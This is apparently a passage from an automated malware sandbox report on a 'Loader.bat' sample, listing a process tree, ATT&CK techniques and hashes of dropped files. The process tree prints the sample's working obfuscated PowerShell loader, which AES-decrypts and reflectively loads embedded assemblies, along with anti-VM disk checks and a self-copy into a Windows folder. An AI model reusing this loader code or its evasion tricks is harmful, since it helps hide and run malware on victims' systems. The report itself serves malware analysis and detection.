    3⤵
    PID:3648
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16783880052684118348,1362091196551749413,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
    3⤵
    PID:3188
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,16783880052684118348,1362091196551749413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4148
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,16783880052684118348,1362091196551749413,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8
    3⤵
    PID:452
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16783880052684118348,1362091196551749413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
    3⤵
    PID:3652
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16783880052684118348,1362091196551749413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
    3⤵
    PID:4228
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16783880052684118348,1362091196551749413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4120 /prefetch:1
    3⤵
    PID:316
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,16783880052684118348,1362091196551749413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 /prefetch:8
    3⤵
    PID:4236
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,16783880052684118348,1362091196551749413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:780
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,16783880052684118348,1362091196551749413,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3588 /prefetch:8
    3⤵
    PID:3180
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16783880052684118348,1362091196551749413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
    3⤵
    PID:2904
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,16783880052684118348,1362091196551749413,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1176
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16783880052684118348,1362091196551749413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
    3⤵
    PID:4692
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16783880052684118348,1362091196551749413,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1
    3⤵
    PID:632
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16783880052684118348,1362091196551749413,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1
    3⤵
    PID:4680
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16783880052684118348,1362091196551749413,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:1
    3⤵
    PID:2720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Temp1_Loader.zip\Loader\Loader.bat" "
  2⤵
  PID:2684
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1500
- - C:\Windows\system32\fsutil.exe
    fsutil fsinfo drives
    3⤵
    PID:2336
- - C:\Windows\system32\findstr.exe
    findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
    3⤵
    PID:632
- - C:\Windows\system32\fsutil.exe
    fsutil fsinfo drives
    3⤵
    PID:608
- - C:\Windows\system32\findstr.exe
    findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
    3⤵
    PID:3924
- - C:\Windows\system32\cmd.exe
    cmd.exe /c echo function orcC($VcbY){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$SYoq=QX[QXSyQXsQXtQXeQXmQX.QXSeQXcQXuQXrQXiQXtyQX.CQXryQXptQXoQXgQXrQXapQXhQXyQX.QXAQXeQXsQX]:QX:QXCQXrQXeQXatQXeQX(QX);'.Replace('QX', ''); Invoke-Expression -WarningAction Inquire '$SYoq.SdMSdodSdeSd=Sd[SdSSdySdstSdeSdmSd.SdSSdecSdurSditSdy.SdCSdrSdySdptSdoSdgSdrSdaSdpSdhSdy.SdCSdiSdpSdhSderSdMSdoSddSdeSd]Sd:Sd:SdCSdBSdC;'.Replace('Sd', ''); Invoke-Expression -Verbose '$SYoq.BAPBAadBAdBAiBAnBAgBA=BA[SBAyBAsBAtBAeBAm.BASeBAcuBAriBAtBAyBA.BACrBAyBApBAtBAoBAgBArBAapBAhBAyBA.BAPBAadBAdBAiBAnBAgBAMBAoBAdBAeBA]BA:BA:BAPKBACBASBA7;'.Replace('BA', ''); Invoke-Expression -Verbose '$SYoq.ffKffeyff=ff[ffSffyffsffteffmff.ffCffoffnvfferfft]ff::ffFffrffoffmBffaffsffeff6ff4ffSfftrffiffnffg("ffsffM0ffmffsffDffDffIffoMffhff1ffSffmff09ffPMffedffmlffRff5ffsff8dffKffdffWffvffJff5ffQgffLff0ff/ffkffKTffMffcff=");'.Replace('ff', ''); Invoke-Expression -Verbose '$SYoq.gvIgvV=gv[gvSgvygvsgvtgvemgv.gvCgvogvngvvegvrtgv]:gv:FgvrgvogvmgvBagvsgvegv6gv4gvSgvtgvrigvngvggv("gvYgvqRgvzgvygvygvqgvRgv5VgvugvmgvBgv3gvO1gvovgvK9gvowgv=gv=gv");'.Replace('gv', ''); $HyBY=$SYoq.CreateDecryptor(); $fhiM=$HyBY.TransformFinalBlock($VcbY, 0, $VcbY.Length); $HyBY.Dispose(); $SYoq.Dispose(); $fhiM;}function tHVO($VcbY){ Invoke-Expression -WarningAction Inquire '$amXY=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm(,$VcbY);'.Replace('uL', ''); Invoke-Expression -Debug '$DOPc=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm;'.Replace('uL', ''); Invoke-Expression -InformationAction Ignore '$ZloT=yjNyjewyj-yjOyjbyjjyjeyjctyj yjSyjyyjsyjteyjm.yjIOyj.Cyjoyjmyjpyjreyjsyjsyjiyjoyjnyj.yjGZyjiyjpyjSyjtyjreyjayjm($amXY, yj[yjIOyj.yjCyjoyjmyjpyjreyjsyjsyjiyjoyjn.yjCoyjmpyjreyjsyjsyjiyjonyjMyjoyjdyjeyj]yj:yj:Dyjeyjcyjoyjmyjpryjeyjsyjs);'.Replace('yj', ''); $ZloT.CopyTo($DOPc); $ZloT.Dispose(); $amXY.Dispose(); $DOPc.Dispose(); $DOPc.ToArray();}function Kxmi($VcbY,$Hqen){ Invoke-Expression -Verbose -WarningAction Inquire -Debug '$fabe=DH[DHSyDHsDHtDHeDHmDH.DHReDHfDHlDHeDHcDHtiDHonDH.ADHssDHeDHmDHbDHlyDH]DH:DH:DHLDHoDHaDHd([byte[]]$VcbY);'.Replace('DH', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore -Debug '$gCDr=$fabe.lNElNntlNrlNylNPlNolNilNntlN;'.Replace('lN', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$gCDroQ.oQInoQvoQooQkoQeoQ(oQ$noQuoQloQloQ, $Hqen);'.Replace('oQ', '');}$iHJt = 'C:\Users\Admin\AppData\Local\Temp\Temp1_Loader.zip\Loader\Loader.bat';$host.UI.RawUI.WindowTitle = $iHJt;$TXrr=[System.IO.File]::ReadAllText($iHJt).Split([Environment]::NewLine);foreach ($WQOD in $TXrr) { if ($WQOD.StartsWith('OEsNQ')) { $oQmN=$WQOD.Substring(5); break; }}$OMnU=[string[]]$oQmN.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$taV = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Verbose '$VJL = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Debug '$Qei = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Kxmi $taV $null;Kxmi $VJL $null;Kxmi $Qei (,[string[]] (''));
    3⤵
    PID:5260
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5268
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 5268 -s 1608
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      PID:6136
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\Temp1_Loader.zip\Loader\Loader.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
      4⤵
      Drops file in Windows directory
      PID:2392
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1572
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
      4⤵
      PID:4524
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5780
    - - C:\Windows\system32\fsutil.exe
        
        fsutil fsinfo drives
        5⤵
        
        PID:1548
    - - C:\Windows\system32\findstr.exe
        
        findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
        5⤵
        
        PID:3180
    - - C:\Windows\system32\fsutil.exe
        
        fsutil fsinfo drives
        5⤵
        
        PID:2864
    - - C:\Windows\system32\findstr.exe
        
        findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
        5⤵
        
        PID:5384
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c echo function orcC($VcbY){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$SYoq=QX[QXSyQXsQXtQXeQXmQX.QXSeQXcQXuQXrQXiQXtyQX.CQXryQXptQXoQXgQXrQXapQXhQXyQX.QXAQXeQXsQX]:QX:QXCQXrQXeQXatQXeQX(QX);'.Replace('QX', ''); Invoke-Expression -WarningAction Inquire '$SYoq.SdMSdodSdeSd=Sd[SdSSdySdstSdeSdmSd.SdSSdecSdurSditSdy.SdCSdrSdySdptSdoSdgSdrSdaSdpSdhSdy.SdCSdiSdpSdhSderSdMSdoSddSdeSd]Sd:Sd:SdCSdBSdC;'.Replace('Sd', ''); Invoke-Expression -Verbose '$SYoq.BAPBAadBAdBAiBAnBAgBA=BA[SBAyBAsBAtBAeBAm.BASeBAcuBAriBAtBAyBA.BACrBAyBApBAtBAoBAgBArBAapBAhBAyBA.BAPBAadBAdBAiBAnBAgBAMBAoBAdBAeBA]BA:BA:BAPKBACBASBA7;'.Replace('BA', ''); Invoke-Expression -Verbose '$SYoq.ffKffeyff=ff[ffSffyffsffteffmff.ffCffoffnvfferfft]ff::ffFffrffoffmBffaffsffeff6ff4ffSfftrffiffnffg("ffsffM0ffmffsffDffDffIffoMffhff1ffSffmff09ffPMffedffmlffRff5ffsff8dffKffdffWffvffJff5ffQgffLff0ff/ffkffKTffMffcff=");'.Replace('ff', ''); Invoke-Expression -Verbose '$SYoq.gvIgvV=gv[gvSgvygvsgvtgvemgv.gvCgvogvngvvegvrtgv]:gv:FgvrgvogvmgvBagvsgvegv6gv4gvSgvtgvrigvngvggv("gvYgvqRgvzgvygvygvqgvRgv5VgvugvmgvBgv3gvO1gvovgvK9gvowgv=gv=gv");'.Replace('gv', ''); $HyBY=$SYoq.CreateDecryptor(); $fhiM=$HyBY.TransformFinalBlock($VcbY, 0, $VcbY.Length); $HyBY.Dispose(); $SYoq.Dispose(); $fhiM;}function tHVO($VcbY){ Invoke-Expression -WarningAction Inquire '$amXY=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm(,$VcbY);'.Replace('uL', ''); Invoke-Expression -Debug '$DOPc=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm;'.Replace('uL', ''); Invoke-Expression -InformationAction Ignore '$ZloT=yjNyjewyj-yjOyjbyjjyjeyjctyj yjSyjyyjsyjteyjm.yjIOyj.Cyjoyjmyjpyjreyjsyjsyjiyjoyjnyj.yjGZyjiyjpyjSyjtyjreyjayjm($amXY, yj[yjIOyj.yjCyjoyjmyjpyjreyjsyjsyjiyjoyjn.yjCoyjmpyjreyjsyjsyjiyjonyjMyjoyjdyjeyj]yj:yj:Dyjeyjcyjoyjmyjpryjeyjsyjs);'.Replace('yj', ''); $ZloT.CopyTo($DOPc); $ZloT.Dispose(); $amXY.Dispose(); $DOPc.Dispose(); $DOPc.ToArray();}function Kxmi($VcbY,$Hqen){ Invoke-Expression -Verbose -WarningAction Inquire -Debug '$fabe=DH[DHSyDHsDHtDHeDHmDH.DHReDHfDHlDHeDHcDHtiDHonDH.ADHssDHeDHmDHbDHlyDH]DH:DH:DHLDHoDHaDHd([byte[]]$VcbY);'.Replace('DH', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore -Debug '$gCDr=$fabe.lNElNntlNrlNylNPlNolNilNntlN;'.Replace('lN', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$gCDroQ.oQInoQvoQooQkoQeoQ(oQ$noQuoQloQloQ, $Hqen);'.Replace('oQ', '');}$iHJt = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $iHJt;$TXrr=[System.IO.File]::ReadAllText($iHJt).Split([Environment]::NewLine);foreach ($WQOD in $TXrr) { if ($WQOD.StartsWith('OEsNQ')) { $oQmN=$WQOD.Substring(5); break; }}$OMnU=[string[]]$oQmN.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$taV = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Verbose '$VJL = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Invoke-Expression -Debug '$Qei = tHVO (orcC (Fk[FkCoFknFkvFkeFkrFktFk]:Fk:FkFFkrFkoFkmBFkasFke6Fk4SFktFkrFkiFkngFk($OMnU[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Fk', '');Kxmi $taV $null;Kxmi $VJL $null;Kxmi $Qei (,[string[]] (''));
        5⤵
        
        PID:5568
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Command and Scripting Interpreter: PowerShell
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        
        PID:3200
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3200 -s 2440
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:3092
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3200 -s 2096
        6⤵
        
        PID:4052
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
        6⤵
        
        PID:1548
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3596
- C:\Windows\$nya-onimai2\qspQho.exe
  "C:\Windows\$nya-onimai2\qspQho.exe"
  2⤵
  PID:2392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3540

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3744

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3900

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3560

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1976

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:4920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1968

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:3508

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2272

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4520

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1228

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2528

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:2220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:5112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:3916

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:2588

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1208

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:2476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:4936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:5072

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:2700

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:5928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4824
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 420 -p 5268 -ip 5268
  2⤵
  PID:5952
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 540 -p 3200 -ip 3200
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:5536
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 576 -p 3200 -ip 3200
  2⤵
  PID:460

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6472.tmp.csv

Filesize
44KB

MD5
0b71069eee3ddbb42d56ca2dee34cbc4

SHA1
895d9e8f863adf7eace2eb160d9af0f9f20943a6

SHA256
2c4e4e193f79e73b673f9862a18c1b0e5327266c53dcd0db9861c73a99c1b85c

SHA512
fdaa3298f31baa65770d12e00158b02bda3bb50415b10d6cc8e3f1477745af05a76fcedf490902e495274893bf4f4f230d3e3819520d617d7a4fdaf2f074c69b

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6492.tmp.txt

Filesize
13KB

MD5
1de8b3094804f3e4c13d8d460d8b4033

SHA1
fc29f1c710d7e3133b49ca41ccab8aa8569e1ec0

SHA256
9b5ecf2c13132fd0a0e07a3d05af1dd761a7c2b4ee013ce23987151acd528320

SHA512
ce23372980a4a4b42d1d816771df8e6958f46ed849118930dacad1e8db9463ca2db34b1d1b5cfcadf6deaf3e9220f7c61983d436c1a0042b5fd33b94473650b5

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FC7.tmp.csv

Filesize
45KB

MD5
2b5cddd85c3d2f28c07375cf82816072

SHA1
cd0fabfc91b7468c524d256af12de623725b1263

SHA256
6ea34ad2e565675f28dff92169fa7a13baa6fd7e271a7fa364a64740cf65c696

SHA512
6b8fad42c09a456e3ad1c4ac3fcdee63fadc993a0e3b7480a3bf6a46ef0b196992256db2cc26a026277e8627c95bac99679146a94cd89fa5e103b49157f4236b

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FF7.tmp.txt

Filesize
13KB

MD5
a6119833db1a1df4acb203349b2fd746

SHA1
764e61b6e579032c666a31df78071a51ada97762

SHA256
0c1044dffcd4afd8de69779e8950a50d24b85a815546b6159c8bebede9e3bee3

SHA512
2bca9e1251ec199e464bc1c133b4d1b0470e69c73352e04dc10f5da24f378c30770e251d7c7913a308b974bdee7eba4ef340a10b17a2ff9fade03aae488a7abe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
85ba073d7015b6ce7da19235a275f6da

SHA1
a23c8c2125e45a0788bac14423ae1f3eab92cf00

SHA256
5ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617

SHA512
eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7de1bbdc1f9cf1a58ae1de4951ce8cb9

SHA1
010da169e15457c25bd80ef02d76a940c1210301

SHA256
6e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e

SHA512
e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
168B

MD5
a6c75bc6321f7247976d11548aa2ab94

SHA1
0f8778e6803325506db41c14b196bcca24a71786

SHA256
12a08b3af0c51de8a905b7f32a61d2287181e7dd6209ab819959604196cea765

SHA512
2e8386b8f605979dfd170207adb5ed7a76711840d6931a5e4eb269824d336e055e22e63dd448c5dc0b0634a58710a246e401715fd78053668d6338e3bfceaad6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ec9a36101106bb4430d0c0046f991991

SHA1
ff90f50af89522aed713be67f874c16295802d42

SHA256
fe9be966efb78b07c7a1e0eb586040fd44a53b277553aae86e2255e4bf521ab2

SHA512
